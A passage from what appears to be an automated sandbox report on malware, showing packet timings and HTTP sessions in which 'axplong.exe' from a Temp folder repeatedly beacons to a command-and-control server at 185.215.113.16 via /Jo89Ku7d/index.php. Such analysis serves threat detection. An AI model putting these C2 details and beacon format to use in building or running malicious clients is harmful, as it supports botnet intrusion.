                  Sep 26, 2024 19:52:49.433449984 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.433484077 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.433639050 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.438405991 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.126606941 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.126735926 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.127507925 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.132399082 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.351277113 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.351603031 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.459295034 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.459621906 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.464596033 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.464610100 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.464668036 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.464708090 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.464840889 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.469655037 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.179711103 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.179836035 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.180469036 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.185270071 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.407063961 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.407212973 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.591872931 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.592415094 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.597754955 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.597820997 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.597901106 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.597966909 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.602061987 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.606897116 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.312113047 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.312263012 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.313121080 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.319643021 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.541975975 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.542072058 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.648647070 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.648951054 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.655122042 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.655210018 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.655659914 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.655839920 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.656029940 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.661660910 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:53.356956959 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:53.357130051 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.357713938 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.362471104 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:53.580178022 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:53.580260038 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.693895102 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.694139957 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.699457884 CEST8049758185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:53.699532986 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.699728966 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.699979067 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:53.700026035 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:53.704555988 CEST8049758185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:54.399414062 CEST8049758185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:54.399467945 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.400074005 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.404905081 CEST8049758185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:54.623898983 CEST8049758185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:54.624075890 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.740598917 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.740905046 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.746172905 CEST8049759185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:54.746191025 CEST8049758185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:54.746273994 CEST4975880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.746485949 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.746485949 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:54.751399040 CEST8049759185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:55.495796919 CEST8049759185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:55.495898008 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.496505976 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.501307964 CEST8049759185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:55.720407009 CEST8049759185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:55.720508099 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.834227085 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.834527016 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.839654922 CEST8049760185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:55.839668036 CEST8049759185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:55.839761019 CEST4975980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.839798927 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.839996099 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:55.844839096 CEST8049760185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:56.574448109 CEST8049760185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:56.574542046 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.575239897 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.580142021 CEST8049760185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:56.810282946 CEST8049760185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:56.810448885 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.912590027 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.912971020 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.917820930 CEST8049760185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:56.917850971 CEST8049761185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:56.917912960 CEST4976080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.917979002 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.918185949 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:56.922951937 CEST8049761185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:57.609208107 CEST8049761185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:57.609441996 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.612977982 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.618149042 CEST8049761185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:57.835885048 CEST8049761185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:57.835952997 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.944016933 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.944519043 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.949173927 CEST8049761185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:57.949259043 CEST4976180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.949337006 CEST8049762185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:57.949412107 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.949594975 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:57.954732895 CEST8049762185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:58.652231932 CEST8049762185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:58.652290106 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:58.653228998 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:58.659405947 CEST8049762185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:58.880757093 CEST8049762185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:58.883797884 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:58.990780115 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:58.991076946 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:58.995954037 CEST8049763185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:58.996150970 CEST8049762185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:58.996263027 CEST4976280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:58.996284962 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:58.996516943 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:59.001919985 CEST8049763185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:59.714957952 CEST8049763185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:59.717603922 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:59.718410015 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:59.723556042 CEST8049763185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:59.952755928 CEST8049763185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:59.952892065 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.069849968 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.070239067 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.075084925 CEST8049763185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:00.075129986 CEST8049764185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:00.075309038 CEST4976380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.075345039 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.075587034 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.080365896 CEST8049764185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:00.789294958 CEST8049764185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:00.789438009 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.790312052 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:00.795126915 CEST8049764185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:01.032973051 CEST8049764185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:01.033226967 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.146930933 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.147337914 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.153230906 CEST8049764185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:01.153244019 CEST8049765185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:01.153346062 CEST4976480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.153419018 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.153599024 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.159097910 CEST8049765185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:01.844961882 CEST8049765185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:01.845176935 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.848648071 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:01.853534937 CEST8049765185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:02.072056055 CEST8049765185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:02.072151899 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.178560019 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.178878069 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.183629036 CEST8049765185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:02.183737040 CEST4976580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.185082912 CEST8049766185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:02.185221910 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.185340881 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.190613031 CEST8049766185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:02.884828091 CEST8049766185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:02.884938002 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.885943890 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:02.890769958 CEST8049766185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.127239943 CEST8049766185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.127429008 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.240840912 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.241460085 CEST4976780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.246157885 CEST8049766185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.246325016 CEST8049767185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.246356010 CEST4976680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.246527910 CEST4976780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.246793032 CEST4976780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.251591921 CEST8049767185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.942074060 CEST8049767185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.942142963 CEST4976780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.948335886 CEST4976780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.948764086 CEST4976880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.953659058 CEST8049768185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.953739882 CEST4976880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.953968048 CEST8049767185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:03.954024076 CEST4976780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.954462051 CEST4976880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:03.959285021 CEST8049768185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:04.715006113 CEST8049768185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:04.715126038 CEST4976880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:04.822523117 CEST4976880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:04.822812080 CEST4976980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:04.827763081 CEST8049769185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:04.827841043 CEST4976980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:04.827877045 CEST8049768185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:04.827940941 CEST4976880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:04.828118086 CEST4976980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:04.832914114 CEST8049769185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:05.519107103 CEST8049769185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:05.519201994 CEST4976980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:05.523403883 CEST4976980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:05.523653984 CEST4977080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:05.529077053 CEST8049770185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:05.529304028 CEST4977080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:05.529623032 CEST4977080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:05.530663013 CEST8049769185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:05.530786037 CEST4976980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:05.534367085 CEST8049770185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:06.238135099 CEST8049770185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:06.238362074 CEST4977080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.351958036 CEST4977080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.352273941 CEST4977180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.369863987 CEST4977280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.478621960 CEST8049771185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:06.478663921 CEST8049772185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:06.478697062 CEST4977180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.478717089 CEST8049770185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:06.478791952 CEST4977080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.478799105 CEST4977280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.479152918 CEST4977280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:06.483957052 CEST8049772185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:07.190201998 CEST8049772185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:07.190445900 CEST4977280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:07.311975002 CEST4977280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:07.312382936 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:07.317523956 CEST8049772185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:07.317563057 CEST8049773185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:07.317589045 CEST4977280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:07.317631960 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:07.317898989 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:07.322978020 CEST8049773185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:08.038485050 CEST8049773185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:08.038583994 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.042412043 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.047293901 CEST8049773185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:08.275141954 CEST8049773185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:08.275235891 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.386785030 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.387281895 CEST4977480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.392168999 CEST8049773185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:08.392237902 CEST8049774185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:08.392292023 CEST4977380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.392319918 CEST4977480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.393218994 CEST4977480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:08.398061991 CEST8049774185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:09.086550951 CEST8049774185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:09.086669922 CEST4977480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:09.093941927 CEST4977480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:09.094656944 CEST4977580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:09.099153996 CEST8049774185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:09.099246979 CEST4977480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:09.099601030 CEST8049775185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:09.099668026 CEST4977580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:09.100327969 CEST4977580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:53:09.105129957 CEST8049775185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:09.811245918 CEST8049775185.215.113.16192.168.2.5
                  Sep 26, 2024 19:53:09.811405897 CEST4977580192.168.2.5185.215.113.16

                  HTTP Request Dependency Graph

                  • 185.215.113.16

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549712185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:03.644375086 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:04.364855051 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:04.367322922 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:04.599431992 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.549713185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:04.714777946 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:05.430788040 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:05.431557894 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:05.664062977 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.549714185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:05.777435064 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:06.488980055 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:06.490010977 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:06.747865915 CEST196INHTTP/1.1 200 OK
